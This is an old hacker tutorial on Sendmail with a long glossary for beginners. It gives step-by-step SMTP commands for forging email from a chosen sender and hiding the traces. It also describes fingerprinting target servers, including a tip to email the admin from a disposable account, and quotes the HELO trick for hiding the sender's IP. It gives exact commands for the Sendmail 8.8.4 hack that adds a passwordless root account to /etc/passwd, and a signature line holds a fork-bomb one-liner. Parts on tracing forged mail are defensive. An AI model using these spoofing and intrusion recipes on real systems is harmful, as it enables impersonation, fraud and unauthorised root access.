Contents
- Sendmail? Huh?
- What is Sendmail?
- What is it used for?
- Why would I want to learn
about Sendmail?
How do I create
authentically-looking fake mails?
- You mean I can send Emails
from bgates@microsoft.com or bclinton@whitehouse.org?!
- Is it possible to create a
100% authentical Email?
- How can I learn raw
Sendmail commands by myself?
- But what if I'm lazy? Can
you pleeease teach me?
- How do I track down
carelessly-made fake mails?
- How do I track down more
sophisticated fake mails?
- Can I get caught?
- Will I get caught?
Hack the server? Through Sendmail?!
- Can I really hack a host
that runs Sendmail?
- So why is Sendmail called
"the buggiest daemon on Earth" anyway?
- Okay, great. Now how do I
do it?
- Can you tell me more about
various Sendmail security holes?
- Where can I find more
Sendmail security holes?
- How can I tell what version
of Sendmail the target host is running?
- Why should I care anyway?
- How can I use the BugTraq
archives to find the holes I'm looking for?
- Can I get caught?
- Will I get caught?
- Final Notes
Okay, so I can hack a host which
runs Sendmail. How do I do it?
* A Local DoS(29) in All
Sendmail Versions Up to 8.9.3 * Bug in Sendmail's HELO command
* Giant Bug in Sendmail 8.8.4 * Final Notes
Newbies corner
- What is a daemon?
- What is a port?
- What is a service?
- What is a daemon banner?
- What is a timeout (in
computer terms)?
- What is TCP and how does it
work?
- What is UDP and how does it
work?
- What is ICMP and how does
it work?
- What is an IP address?
- What is a hostname?
- How to find out what your
ISP's mail servers are?
- What is a portscanner?
- What is a services scanner?
- What/who is root?
- What is bandwidth?
- What is a client program?
- What is a DNS server?
- What is Telnet (the Telnet
daemon and the Telnet program)
- What is a command
interpreter?
- What is a shell account?
- Who is a sysadmin?
- What is hyper text?
- What is an RFC?
- What is InterNIC?
- What is a sub domain (and
how much does a domain really cost?)?
- What is SSH?
- What is a moderated mailing
list / message board?
- What is a DoS attack?
- What is DUN?
- What is a dial-up account?
- What is a Unix password
file?
- What is a thread?
Appendix A: Fake Daemons
- Fake Sendmail daemon
- Fake Telnet daemon
Appendix B: Routing Mail
- How can I route my mail?
- How would that help me?
Appendix C: Faking the sender's
IP
- How can I fake my IP on the
Email's header?
- Where can I read more about
this kind of stuff?
Appendix D: Reply-to
- What does the Reply-to
option do?
- How do I use it?
Appendix E: CC and BCC
- What do these commands do?
- How do I use them?
References
Bibliography
- Sam Spade's Library
- Various online magazines
- BugTraq's archives
- Packet Storm Security
- Security Focus
- Rootshell
- Hackersclub
Sendmail? Huh?
Sendmail is a daemon(1) which waits for connections on port(2) 25.
It is used to send outgoing mail.
For example: your Email provider (probably your ISP (Internet
Service Provider)) probably uses two servers (unless it's a
web-based mail account such as Hotmail.com):
1) mail.boring-ISP.net (probably port 110): for incoming mail.
2) mailgw.boring-ISP.net (port 25): for outgoing mail.
Most of the time mail servers look pretty much like this, but the
addresses vary from different ISPs.
Mail.boring-ISP.net would require a username and a password so
people won't be able to read your Emails, so let's skip this one (I
might discuss cracking those passwords in another tutorial, but
remember - I'm teaching you these things so you'll be able to know
how malicious crackers work and not fall for their tricks, not for
you to break the law and harm others). Now, as surprising as it may
sound, mailgw.boring-ISP.net will not require a password or any
other means of identification. If you telnet(19) into
mailgw.boring-ISP.net on port 25 and type in the right commands you
will be able to send fake mails. Interesting, huh?
Now, the coolest part is that you can actually hack a server running
Sendmail or at least bring it down, since Sendmail contains a
crapload of bugs and security holes.
How can I create authentically-looking fake mails?
As mentioned in the previous chapter, sending mail does not require
you to have an account on the machine you're sending the mail from
(the mail server, not your computer). All you need to know is the IP
Address(9) / Hostname(10) of the mail server and Sendmail commands.
So far we assume that you know the IP/hostname of your target. If
you still don't know this important detail, please find out(11).
Now, let's get on with it. This time, unlike previous tutorials, I
will "learn" all over again how to do everything I
describe here and walk you through the entire process of learning
and using what you have learnt.
Alright, let's begin.
Our target outgoing mail server for today is mailgw.someone.com on
port 25.
First, let's telnet into that port by either typing 'telnet
mailgw.someone.com 25' (without the quotes) on a standard Unix
text-based system, running C:\Windows\telnet.exe or your favorite
telnet application and typing in mailgw.someone.com in the host
field and 25 in the port field, or executing your favorite telnet
application from XWindows (a graphical interface for Unix. If you're
smart enough to be running some version of Unix you shouldn't have a
hard time finding one. If you don't like the default telnet programs
you could always go to www.linuxberg.com and grab one) and typing in
the correct details (host and port).
Note about VT: you might be asked to choose a terminal type during
the connection process. Something with VT and some number in it...
hmm...
VT stands for Virtual Terminal. Since there are several types of
terminals (all sorts of monitors, old printer terminals etc') you
are asked to choose a terminal type (compatibility issues). VT100
should suite most people just fine.
Note about shell accounts(21): if you're not running Unix and you
wish to use Unix tools on Unix systems while you work, telnet to
nether.net on port 23, login as newuser and get yourself a free
shell account. If you'd rather user Window's tools (I use Window's
stuff when I work from Windows, except certain conditions when I
really NEED Unix and I don't want to reboot and boot it up. In that
case, I get myself a shell account so I am able to use Unix stuff
while working from Windows) go ahead (things will work faster since
the tools are actually located on your machine, not on some distant
computer which runs a shell account), but I still recommend that you
will get a shell account at nether.net (in fact they teach you a lot
of great Unix-newbies stuff when you sign up).
Note about Telneting from Macintosh: Macintosh does not come with a
Telnet program. However, you can download one from: http://www.ncsa.uiuc.edu/SDG/Software/MacTelnet/
(thanks to little_v for this one!).
Now, let's see what we get after we telnet(19) to
mailgw.someone.com:25 (in this case, the character : stands for 'on
port', so mailgw.someone.com:25 means mailgw.someone.com on port
25).
220 alpha.someone.com ESMTP Sendmail 8.9.3/8.8.6; Thu, 8 Jul 1999
21:46:04 +0000 (GMT).
AHA! This is... this is... ugh... WHAT THE HELL IS THIS THING?!
This, my friends, is a daemon banner(4), and it just gave us tons of
valuable pieces of information!
Normally, this info is intended for a client program(16) to
determine what version of Sendmail the target is running and how to
communicate with it (the program should know that, for example,
every Sendmail version below 7.0.0 uses the command 'halb' instead
of the command 'blah', etc').
This daemon banner thing is also great for hackers and crackers,
since we can determine what version our target is running. Later,
when we will discuss about how to actually hack the server, this
data would be EXTREMELY valuable.
Okay, let's analyze what we've got...
220... we don't know what this is right now...
alpha.someone.com... no luck, can't make anything out of it so
far...
ESMTP... hmm... SMTP stands for Simple Mail Transfer Protocol. It is
the protocol(18) used by email clients to communicate with Sendmail
daemons, and this is what we're trying to learn right now. ESMTP is
Extended SMTP. It's the same as SMTP, only it contains some more
commands. Let's leave this alone for the time being.
Sendmail 8.9.3/8.8.6 - AHA! There's something interesting. We got
the version of the Sendmail daemon! Remember this, it will help us
during the next chapter (hacking into servers who run Sendmail).
The rest is garbage (time, date, etc' etc' etc').
Okay, so let's move on... umm... how do I communicate with this
thing?
Er... let's try typing 'help' (without the quotes). Oh, by the way,
it is normal not to see what you type when you talk to Sendmail
since it won't send back your keystrokes. You have to turn on
"local echo" in your telnet program in order to see what
you type.
214-This is Sendmail version 8.9.3
214-Topics:
214- HELO EHLO MAIL RCPT DATA
214- RSET NOOP QUIT HELP VRFY
214- EXPN VERB ETRN DSN
214-For more info use "HELP <topic>".
214-To report bugs in the implementation send email to
214- sendmail-bugs@sendmail.org.
214-For local information send email to Postmaster at your site.
214 End of HELP info
Wee! This is cool!!
By this time you should have guessed that this number (the 220 in
the daemon banner and the 214 here) is actually a 'message type'. It
states the type of the message you got. Each type of message (error
because of this, error because of that, help page for this,
confirmation message for that etc') has it's own number.
Okay, let's move on. Let's try typing 'help helo'.
214-HELO <hostname>
214- Introduce yourself.
214 End of HELP info
See? I told you so. 214 is the
message type number for help messages.
Okay, so that way you can practically teach yourself what every
Sendmail command does. Stop right now, read all the help pages and
then continue. It is important that you'll learn how to learn things
by yourself. You might see some notes concerning the word RFC(24)
and some numbers. You can find RFCs at http://www.linuxberg.com.
Note about ESMTP: remember that ESMTP thing we came across? You'll
be able to get a good clue on what ESMTP is by reading the help
pages. Yes, I am trying to force you to read them... so please do.
They contain tons of great information for newbies as well as pros.
Okay, I'm assuming you've finished reading all those help pages. Now
let's move on.
First we need to enter a sender. We do this by typing 'MAIL FROM:
<fake Email address>' (remove the quotes and replace fake
Email address with the fake Email address of your choice, say...
bgates@microsoft.com (but leave the < and the >)).
The mail server should reply with this message:
250 bgates@microsoft.com... Sender ok
Next we type 'RCPT TO: <recipient>'. Replace recipient with
the target, say victim@victim.com. We should get
250 victim@victim.com... Recipient ok
You can add recipient by simply doing this command several times,
only with different recipients.
Now, let's move on to the actual message body. Type 'data' to start
writing the body of the message.
354 Enter mail, end with "." on a line by itself
Now let's type in some stuff...
Subject: fake message (note about this line: in this line you get to
determine what subject you want to give for your message).
Hello. This is a fake Email message.
I'm bored.
Gimme something to hack!!
.
Now we get this
250 CAA15313 Message accepted for delivery
You must be wondering right now what the heck is that number after
the 250. This is called the message ID (or MID). It's just a stupid
number, but we'll use them later... don't you worry your pretty head
about this.
Now, if you were the recepient you would have got a 100%
reliably-looking fake mail. OR IS IT?
Let's take a look at what the recepient would get...
Hmm... welp, looks like an ordinary message to me. At least it does
to the ordinary user.
Now let's look at the headers.
Headers are a couple of lines which come with every Email address.
Most of today's Email clients show only the simpler parts of the
header (sender, subject, date and time etc'), but right now we need
the full header.
On Netscape Messanger displaying the full headers is done by going
to View ==> Headers ==> All.
On Eudora this is done by clicking on the button which displays the
"blah blah blah" caption when you put your mouse cursor
above it for a second or two.
Compuserve automatically displays the full header.
On Outlook, right click the message on your inbox, choose properties
and choose details.
On pine, you should have an option somewhere in the configuration
screens that let's you choose what kind of header you want to view
(full or briefed).
Now let's take a look at the full header, shall we?
Received: from alpha.netvision.net.il (alpha.netvision.net.il
[194.90.1.13]) by cmx.netvision.net.il (8.9.3/8.9.3) with ESMTP id
CAA15313 for victim@victim.com>; Sat, 10 Jul 1999 02:49:59 +0300
(IDT)
From: bgates@microsoft.com
Received: from some.hostname.crap.com (some.hostname.crap.com
[62.0.146.225]) by alpha.someone.com (8.9.3/8.8.6) with SMTP id
CAA15313 for victim@victim.com; Sat, 10 Jul 1999 02:55:46 +0300 (IDT)
Date: Sat, 10 Jul 1999 02:55:46 +0300 (IDT)
Message-ID: <199907092355. CAA15313@alpha.someone.com>
X-Authentication-Warning: alpha.someone.com: some.hostname.crap.com
[62.0.146.225] didn't use HELO protocol
Subject: Fake mail
Status:
X-Mozilla-Status: 8001
X-Mozilla-Status2: 00000000
X-UIDL: 3752da3b000002ff
Yeehaw! Look at all those numbers and letters and shiny things!
Let's start from the top, shall we?
Received: from alpha.someone.com (alpha.someone.com [194.90.1.13])
by cmx.someone.com (8.9.3/8.9.3) with ESMTP id CAA16970 for >;
Sat, 10 Jul 1999 02:49:59 +0000 (GMT)
Okay, so the mail was received from alpha.someone.com (alpha.someone.com
[194.90.1.13]). What does that mean?
A quick checkup on InterNIC(25)'s databases (type 'whois
alpha.someone.com' without the quotes on a Unix system or download
SamSpade for Windows at www.samspade.org) reveals that it is owned
by someone.com. This is probably some kind of a sub-server they use
to send mail. Let's leave it alone, it's not important to us right
now. The (alpha.someone.com [194.90.1.13]) part shows you the
hostname(10) and the IP address (9) of the server the Email was sent
from.
Ooh, ooh, wait! Wasn't the mail supposed to be sent from
microsoft.com? I mean, the sender is bgates@microsoft.com!
If we did the mail forging thing on microsoft.com instead of on
someone.com this wouldn't have happened, now would it? It would have
seemed like an ordinary Email... from Bill Gates... well, at least
so far.
Anyway, the rest is just the MID (which we will get to later) and
the date of the message (the sending date) according to the server
which the message was sent from. The +0000 (GMT) part means that it
was sent from the Greenwich time zone. If it was sent, for example,
from the +0200 time zone it would have meant that this time zone's
time is actually Greenwich time plus 2 hours. Find our your time
zone first so you'll be able to switch time zones and find out when
was the message sent in your time.
Now, on to more important things.
From: bgates@microsoft.com
Well, I guess this line is obvious... let's move on.
Received: from some.hostname.crap.com (some.hostname.crap.com
[62.0.146.225]) by alpha.someone.com (8.9.3/8.8.6) with SMTP id
CAA15313 for victim@victim.com; Sat, 10 Jul 1999 02:55:46 +0300 (IDT)
Okay, now this is really interesting. Now we get the sender's
hostname and IP address.
Note about the hostname: a dial-up(31) user will have a long and
twisted hostname. For example: my hostname right now (at least when
I was writing these lines) is RAS4-p97.hfa.netvision.net.il.
Netvision.net.il is my ISP, and the rest is mostly crap (pay close
attention to the hfa thing. Hfa stands for Haifa, which is my home
town. It means that I'm connected through Netvision's Haifa server.
See? Hostnames can be interesting).
You must have noticed by now that the hostname we got is certainly
not from microsoft.com, and that the mail server who sent this isn't
exactly microsoft.com or a microsoft sub-domain(26) either, which
clearly shows that this Email is completely fake.
Another note about the hostname: sometimes you might not get a
hostname, but you will always get an IP address. You can find the
IP's hostname (most IP addresses do have a hostname) by doing 'nslookup
ip-address' without the quotes on a Unix system or going to http://www.samspade.org
and using their DNS(17) Lookup Tool. If you still can't get it, try
doing a whois.
To overcome this problem, you need to do two things:
1) Send this mail from Microsoft's Sendmail server.
2) Send this mail from an account that is connected to the web
through Microsoft. If you can't get one, it will clearly show in the
headers that the mail wasn't sent from Microsoft.
Note: nice trick to pull on someone: if your ISP is blah.com, you
can send your friends an Email from admin@blah.com which will look
100% authentic!
Anyway, the next few characters give us the MID (Message ID), as
well as other pieces of info. I promised we'll get to the MID,
didn't I?
If you think someone is trying to trick you into thinking he's
somebody else, send an Email to abuse@your.ISP.com or abuse@the.ISP.where.the.message.came.from.com
(in this case Microsoft.com) or abuse@the.server.who.stores.the.MID.com.
To know which server stores the MID, we'll need to skip a few lines
(two lines actually - time and date) and get straight to this:
Message-ID: <199907092355. CAA15313@alpha.someone.com>
Aha! Look at these interesting numbers! And check this out:
CAA15313@alpha.someone.com! This means all the info regarding the
MID is stored at alpha.someone.com! Let's send an Email to abuse@alpha.someone.com
and tell them that we think we received a fake mail, and include the
entire header. Next thing we'll do the same with the ISP of the
sender (in our case, the sender is some.hostname.crap.com
[62.0.146.225], meaning his ISP is probably crap.com).
Now, on to the next line:
X-Authentication-Warning: alpha.someone.com: some.hostname.crap.com
[62.0.146.225] didn't use HELO protocol
Damn! I knew we forgot something! Now let's do it all over again,
but this time we'll type HELO microsoft.com at the beginning.
HELO microsoft.com
We get this:
250 mailgw1.netvision.net.il Hello some.hostname.crap.com
[62.0.146.225], pleased to meet you
The rest is exactly like in the last time (sender, rcpt to, etc'
etc'). Now let's see what victim@victim.com would have gotten.
Aha! No X-Authentication-Warning!
Final notes
I hope you enjoyed this chapter. Now you've learnt how to play
harmless and legal tricks on your friends, how to spike-down fake
mails and how easy it is to catch you if you're trying to do illegal
stuff.
Oh, and by the way, there is a way to hide your IP/hostname when
faking mail... for more information, read the second section in the
'Okay, so I can hack a host which runs Sendmail. How do I do it?'
chapter.
Hack the server? Through Sendmail?!
Yeah, sure, why not? I mean, EVERY service(3) is vulnerable to some
attacks. That's why it is recommended to run as less services
possible on your computer.
But the most vulnerable one is Sendmail (this is why it is called
'the buggiest daemon on Earth' or 'the buggiest daemon on the
planet'). A member of the mailing list once told me that he just
can't wait to read the Sendmail Tutorial (this was before this
tutorial has been released) and that he himself runs Sendmail on his
computer. Running Sendmail on a personal computer is unnecessary and
dangerous. If your computer does not act as a mail server, there is
no reason for you to run Sendmail (unless you want people to be able
to send mail to your-account@your.IP.address instead of
your-account@your.ISP.com. Note about your-account: in the first
address, your-account is the name of your username on your own
computer (Unix users should know what I am talking about). In the
second address, your-account is your username at your ISP).
Note: the information in this chapter can be either used to hack
servers, or the other way around - to protect your server. Please
don't break the law, or at least don't spew out my name during the
investigations... hehe...
Okay, so the first thing we have to do in order to hack a server
through a specific service (or to improve the security of a specific
server) is it's (the service's) version. This can be easily done by
viewing the daemon banner(4). Suppose we came across a computer that
runs Sendmail 8.8.3 (which was quite old when this tutorial was
written, meaning there should be a couple of bugs here. Sendmail is
upgraded mostly when a new bug is found. In fact, everything except
of the daemon's security is rarely changed during upgrades).
Next thing we'll try to determine the OS (Operating System) which
this daemon runs on. If Sendmail's banner won't tell us, the
Telnet(19) daemon will. First telnet to port 23 and cross your
fingers. If there's a daemon on that port, it's probably the Telnet
daemon, and it'll probably give you the name and version of the OS.
If not, you can either:
1) Try looking for a guest account (username: guest, password: guest
or username: newuser, password: newuser), since some systems give
you these details only after you log in.
2) Email admin@your-target.com and ask him (I recommend opening a
mailbox on one of those free mailbox services such as Hotmail and
Emailing him from there, since some admins(22) might get a little
suspicious...).
3) Try going to your target's website. This kind of information
might be there, somewhere.
If you still didn't find the OS, fear not! We might still be able to
do a cool hack without this information, but still this information
might come in handy, so do all you can to get your hands on it.
Next thing, you browse some online databases until you find the hole
you've been looking for. First of all I'll explain about the largest
and most recommended online databases, and then I'll teach you how
to search them, plus some valuable concepts and words you need to
get familiar with.
Packet Storm Security
URL: http://packetstorm.securify.com.
One of the largest online databases for security-related
information. I recommend going there once a day and reading the 'New
Files Today' section, whether you're looking for specific holes or
not.
The archive was founded by Ken Williams and gets hundreds of
thousands of hits per week.
It has recently been transferred into the ownership of Kroll-O-Nagra
(www.securify.com).
Security Focus
URL: http://www.securityfocus.com.
Another comprehensive database. Updated daily. These guys never
sleep!
BugTraq
URL: hosted by Security Focus (http://www.securityfocus.com),
previously hosted by Netspace (http://www.netspace.org).
BugTraq is one of the best security mailing list out there. The list
is moderated, meaning that if you find a new security hole, you can
only send your message to the moderator, Aleph1 (aleph1@underground.org).
Aleph1 filters out all the spam, lame messages and old bugs and
posts only the good ones to the list.
I recommend signing up at http://www.securityfocus.com. You can also
search their archive, which is by the way my favorite
security-related database, by going to securityfocus.com and looking
for a link called 'search'.
Searching
If we are looking for a bug in Sendmail 8.8.3, we'll need to type
the following search keywords: 'sendmail 8.8.3' (without the
quotes). If we're looking for something specific, such as a local
DoS(29) attack against any version of sendmail, we will use the
following search keywords: 'local DoS sendmail', etc'.
Searching Packet Storm
Packet Storm should have a search box somewhere (Ken changes the
layout every now and then so I can't give you the exact location of
the box). You can divide the search results you will get into two
categories: texts and programs.
For example: you searched for a specific hole and you got a couple
of text files and a couple of programs. The text files explain about
the bugs and how to exploit it, while the programs use the hole to
get in.
These programs are often called 'exploits' and usually come as a
source code instead of as a binary file. Let me explain: a binary
file is any file that isn't made of text. Executable files are
usually binary files. Now, in our case, programs come as sources
instead of binary. Sources are in the form of plain text, and
they're actually a bunch of commands. When given to a compiler, this
source code turns into an executable binary (except for source codes
written in the Perl programming language, which can be executed in
the form of sources if you have the right program). Anyway, these
programs come in the form of sources so you will be able to
understand how they work instead of blindly running them.
Searching Security Focus
Security Focus offers more organized information. Instead of various
bits of information, Security Focus offers articles. These include
exact definitions of the bug, where and when it should happen, work-arounds
(how to solve it) etc'. The only backdrop in Security Focus is that
it is smaller than other databases.
BugTraq
Ah... my favorite database. When people post something to BugTraq
about a security hole they found, other people can reply to them and
share their side of the story. For example: did it work on their
computer too, how to fix the bug in various ways, what causes the
bug in the first place etc'. You can compile a full database with
all of the necessary information by simply reading a couple of
posts.
Getting Caught
If you're planning on doing something bad, please don't. You can get
caught. Better crackers than you already got caught. Don't be
stupid.
Okay, so I can hack a host which runs Sendmail. Now how do I
do it?
I have made a nice list with several security holes regarding
Sendmail just to give you the hang of it.
Bug in Sendmail's HELO Command (taken from rootshell.com)
Note: this won't get you root access(14) or get you into partsin a
system you're not supposed to get into, but this is still pretty
cool. In fact, it let's you hide your IP/hostname when faking mail!
[ http://www.rootshell.com/ ]
We've had this exploit since January but sat on it until everyone
had a
change of implementing a stable version of sendmail 8.9.x. (And
because the
last thing I want to do is help the spammers) It has now made its
way to
Bugtraq so without further ado.
--Rootshell 5/28/98
Date: Fri, 22 May 1998 12:36:54 +0300
From: Valentin Pavlov <root@PNS.NETBG.COM>
Subject: about sendmail 8.8.8 HELO hole
I assume this this is pretty old (10 Jan 1998) but still...
I found a pretty simple way to prevent the hiding of the sender's IP
address. The method to hide the IP address of the sender is
described
bellow. Now, if we want to keep track of such exploit attempts, we
have to
compile sendmail 8.8.8 with a PICKY_HELO_CHECK defined in conf.h:
#define PICKY_HELO_CHECK 1
This will force sendmail to syslog an authentication warning
(message with LOG_INFO level) and include an
X-Authentication-Warning:
header in the message, saying what host tried to hide itself. Check
out
the source (srvrsmpt.c, main.c). Also, LogLevel must be set to a
value
higher than 3 (default is 9) in sendmail.cf.
regards,
capone
Make source, not [high]score
Valentin 'Val Capone' Pavlov
capone@netbg.com, UKTC87203
Now for the original message, describing the exploit:
-----Original Message-----
From: Michał Zalewski <lcamtuf@boss.staszic.waw.pl>
To: info@rootshell.com <info@rootshell.com>
Date: 10 stycznia 1998 12:28
Subject: Sendmail 8.8.8 (qmail?) HELO hole.
Here's a brief description of Sendmail (qmail) hole I found
recently:
When someone mailbombs you, or tries to send fakemail, spam, etc -
sendmail normally attachs sender's host name and it's address
to outgoing message:
--
>From spam@flooders.net Mon Jan 5 22:08:21 1998
Received: from spammer (marc@math.university.edu [150.129.84.5])
by myhost.com (8.8.8/8.8.8) with SMTP id WAA00376
for lcamtuf; Mon, 5 Jan 1998 22:07:54 +0100
Date: Mon, 5 Jan 1998 22:07:54 +0100
From: spam@flooders.net
Message-Id: <3.14159665@pi>
MAILBOOM!!!
--
That's perfect - now you know, who is responsible for that annoying
junk in your mailbox: "Received: from spammer (marc@math.university.edu
[150.129.84.5])". Nothing easier...
But I found a small hole, which allows user to hide it's
personality,
and send mails anonymously. The only thing you should do is to
pass HELO string longer than approx. 1024 B - sender's location and
other very useful information will be cropped!!! Message
headers should become not interesting. Sometimes, sender
may become quite untraceable (but not always, if it's possible
to obtain logs from machine which has been used to sent):
--
>From spam@flooders.net Mon Jan 5 22:09:05 1998
Received: from xxxxxxxxxxxxxx... [a lot of 'x's] ...xxxx
Date: Mon, 5 Jan 1998 22:08:52 +0100
From: spam@flooders.net
Message-Id: <3.14159665@pi>
MAILBOOM!!! Now guess who am I...
--
Here's a simple example of Sendmail's HELO hole usage. Note, this
script has been written ONLY to show how easy may be sending
fakemails, mailbombs, with cooperation of Sendmail ;) Script is
very slow and restricted in many ways, but explains the problem
well (note, some of non-Berkeley daemons are also affected,
probably Qmail?):
_______________________________________________________________________
Michał Zalewski [tel 9690] | finger 4 PGP [lcamtuf@boss.staszic.waw.pl]
Iterować jest rzeczą ludzką, wykonywać rekursywnie - boską [P.
Deustch]
=--------- [ echo "while [ -f \$0 ]; do \$0 &;done"
>_;. _ ] ---------=
Giant Bug in Sendmail 8.8.4 (taken from hackersclub.com)
sendmail8.8.4 exploit
"sendmail? 'tis the bugiest program" -phriend-
Ok, here's a brief and interesting explonation of this famous
exploit. This
exploit uses sendmail version 8.8.4 and it requires that you have a
shell
acount on the server in question. The exploit creates a link from
/etc/passwd to /var/tmp/dead.letter Very simple really. Here's how
it
works, below are the exact commands as you have to type them (for
the
technically challendged ones)
* ln /etc/passwd /var/tmp/dead.letter
* telnet target.host 25
* mail from: nonexsistent@not.an.actual.host.com
* rcpt to: nonexsistent@not.as.actual.host.com
* data
* lord::0:0:leet shit:/root:/bin/bash
* .
* quit
Kaboom, you're done, telnet to port 23 and log in as lord, no
password
required. Thanx to a little bit of work we did, lord just happens to
have
the same priviledges as root.
There are a couple of reasons why this might not work.
1. /var and / are different partitions (as you already know, you
can't
make hard links between different partitions)
2. There is a postmaster account on a machine or mail alias, in
which
case, your mail will end up there instead of being written to a
etc/passwd
3. /var/tmp doesn't exist or isn't publicly writable
Duncan Silver
www.hackersclub.com/uu
Editor's notes: lord::0:0:leet shit:/root:/bin/bash is a line out of
a Unix password file(33).
Final Notes
You must have noticed that I didn't put anything from BugTraq. This
is because everything that goes to BugTraq gets at least one reply
(from my experience), and I don't feel like posting whole
threads(34) here (they're too damn long).
Newbies corner
1. Daemon - a program that listens for incoming connections on a
specific port(2). Some daemons may receive commands from you and
interact with you, others may simply spew out some text/binary and
quit.
2. Port - (for the more technical explanation of what ports are, see
the end of this explanation) ports are like holes that enable things
(data, in this case) to come into them.
There are physical ports and software ports on your computer.
Physical ports are those slots on the back of your computer, your
monitor etc'. Now, software ports are used when connecting to other
computers.
For example: I just bought a new computer and I want to turn it into
a webserver (I want to enable people to access selecetd web pages,
pictures, cgi and java scripts or applets, programs etc' that are
located on my computer (MY computer, not on some cheesy free webhost
such as Geocities), and I want those people to be able to do that
using nothing but a browser). In order for that to happen, I need to
install a webserver program.
The webserver program opens a port on my computer called port 80
(this number can be changed, but this is the default number). Then
it listens to incoming connections on that port.
When someone starts his Internet browser (Netscape, Lynx, Microsoft
Explorer etc') and surfs to my website, his browser connects to my
computer on port 80 and then sends HTTP commands that my webserver
program can understand into it.
My webserver program quickly picks up the incoming data and then
sends it back into a port that the surfer's browser opened on the
surfer's computer. The browser will listen on that port and wait for
the data (the HTML page, the picture, the program etc') to come in
through it.
Note about non-default ports: if you decide to put, say, a webserver
on a non-default port, it'll be harder for people to get in. If you
decided to put it on port... umm... 8000 instead of 80, people will
have to type in your IP address(9) or your hostname(10) if you have
one and add a :8000 at the end. For example:142.30.5.79:8080. Simply
typing in 142.30.5.79 inside your browser's URL field is as same as
typing 142.30.5.79:80, so it's best to put a webserver on port 80
(unless you only want a specific group of people who will be given
that number to access your webserver, but such a blockage can be
easily cracked using a portscanner(12)).
There are different ports for different services(3) so data won't
mix up. Imagine your browser getting data your FTP client was
supposed to get.
I hope you got the main idea of what a port is.
Now, there are three kinds of ports: well-known ports, registered
ports and dynamic/private ports.
The well known ports are those from 0 through 1023. These are
default ports for several services. For example: the default port
for webservers is 80. Else, how would your browser know which port
he has to access?
Now, the registered ports are those from 1024 through 49151. These
ports are reserved for several programs. For example: ICQ (www.icq.com)
reserves several ports for listening to various incoming events
(messages, file transfers etc') on it.
The dynamic and/or private ports are those from 49152 through 65535,
and can be used by anyone for any given purpose.
Important note about well-known ports: services(3) on these ports
can be only ran by root, so inferior users won't start messing up
with important ports.
3. Service - a daemon(1) that allows everyone who connects to it (or
a specific group of people. For example: anyone from this IP(9)
range, everyone who knows the secret password etc') to use some kind
of service.
For example: a webserver such as the one described in section one on
this chapter (the explanation regarding what is a port) is a service
because it allows people to come in and ask for certain pieces of
data.
The simplest example of a service I can think of is
"daytime". Daytime waits for incoming connections on
port(2) 13 and when someone goes by it immedietly announces the
current time on the computer that runs it (with no need from you to
type in any commands or passwords or anything). Simple.
4. Daemon banner - most daemons(1) give away some technical info to
anyone who connects to them on some point. This information can be
used by anyone who connects to that daemon simply for it to know how
to interact with the daemon best (which daemon is it, what version,
etc'), but it can also be used by hackers.
Let's try connecting to port(2) 23 on someone.com (note: I've made
up this hostname(10) and all the details regarding it simply to
teach you about daemon banners. I really don't know whether there is
such a hostname and whether the details I'm about to give you are
correct). On port 23 you would usually find Telnet(19). Telnet is a
service which at first asks you for a username and a password on
most cases (unless you typed in an "unpassworded"
username. In that case it will simply log you in as that user
without requesting for a password) and then runs a program specified
by the sysadmin(22) and let's you work with it. In most cases you
will get into a text-based shell (a command interpreter(20)). The
problem is: you cannot do ANYTHING. It all depends on what kinds of
permissions the user that you are logged in as has. The user
root(14) has all permissions (read everything, write (and delete)
everything, execute everything and change other people's
permissions).
Okay, so let's try going to port 23 on someone.com. At first we get
this:
Welcome to someone.com, running FreeBSD 4.13
Login:
Aha! Someone.com is running an operating system called FreeBSD 4.13!
That has to be worth something (we might come across a bug report
regarding a bug that exists on FreeBSD 4.13 and might enable us to
hack this server at a certain point). Every piece of information
about a webserver is important.
Now, since we don't know a username and a password for this server
we could either terminate the connection or try guessing. Most
servers have a guest account (username: guest, password: guest or
just username: guest) or a newuser account (username: newuser,
password: newuser, or just username: newuser), but that certainly
won't help us hack these guys... unless there's a major hole in
these accounts. You'll have to figure these things out by yourself.
Note about the word server: a computer is called a server if it
offers any services. If not, it is called a host.
5. Timeout - okay, so I've got a daemon(1) waiting on port(2) 23 for
incoming connections. Now, what happens if someone connects to it
and does absolutely nothing? He would simply remain connected to
that daemon until one of us either reboots or closes the connection.
You don't want anyone connecting to some port on your computer and
just hanging there, do you? This would only waste valuable
bandwidth(15)!
Most people will not want to monitor their network status 24 hours a
day and disconnect everyone who decides to hang around for a while
(especially on large networks). This is why timeout was invented.
By setting a timeout value to a daemon (this can be done during the
setup process or by running a setup program or entering some sort of
an options box) you can make it close the connection on anyone who
connets to it and does nothing for over than the timeout value.
For example: you put a daemon on port 17 and tell it to timeout
after 2.5 seconds. If someone will connect to your daemon and will
not type anything for over than 2.5 seconds the daemon will close
down the connection and that person will have to reconnect and start
typing something before the daemon times out and throws him out.
This is why webservers have a short timeout of 2 seconds (most
people connect to webservers using client programs(16), and these
programs "type" really fast...).
6. TCP - stands for Transfer Control Protocol. TCP is a protocol
that is used for transferring data through networks (the Internet,
local networks etc'). TCP is much more reliable than UDP since it
uses several precautions, such as sequence numbers and all sorts of
nifty header flags and all (see the excellent article called 'IP
Spoofing Demystified' at the Books Section in http://blacksun.box.sk
for lots of info regarding TCP (a real MUST READ!!)).
TCP's only disadvantage is that it is a bit slower than UDP, but it
is more reliable, hence it is used to transfer sensitive files (such
as programs - if you lose a single bit of the file, the whole thing
is useless).
7. UDP - stands for User Datagram Protocol. UDP is a protocol that
is used for transferring data through networks (the Internet, local
networks etc'). UDP is less reliable than TCP (see the excellent
article called 'IP Spoofing Demystified' at the Books Section in
http://blacksun.box.sk for lots of info regarding UDP (a real MUST
READ!!)), but it is also a little faster, hence programs such as
Real Player (see http://www.real.com) use it for streaming video and
more, where losing a single packet(32) or two is not such a big
deal.
8. ICMP - stands for Internet Control Message Protocol. A protocol
used for transferring errors over a network (the Internet, local
networks etc').
9. IP address - every computer connected to the Internet has an IP
address. If another computer wants to interact with your computer it
will need your IP, just like you need another person's phone number
to call him.
IP addresses should look like that: x.x.x.x, where x can be a number
between 0 to 255.
Note: there are "special" IP addresses which aren't use to
connect to other computers. For example: 127.0.0.1 means localhost,
which means you (your computer). Connecting to a certain port(2) on
the IP 127.0.0.1 will connect to that port on your computer.
Oh, by the way, IP stands for Internet Protocol(18).
10. Hostname - hey, guess what! I just found out this really cool
site! But I can't remember it's IP address, and when I do, I hate
typing in these long IP addresses(9). Sure, I can bookmark it, but
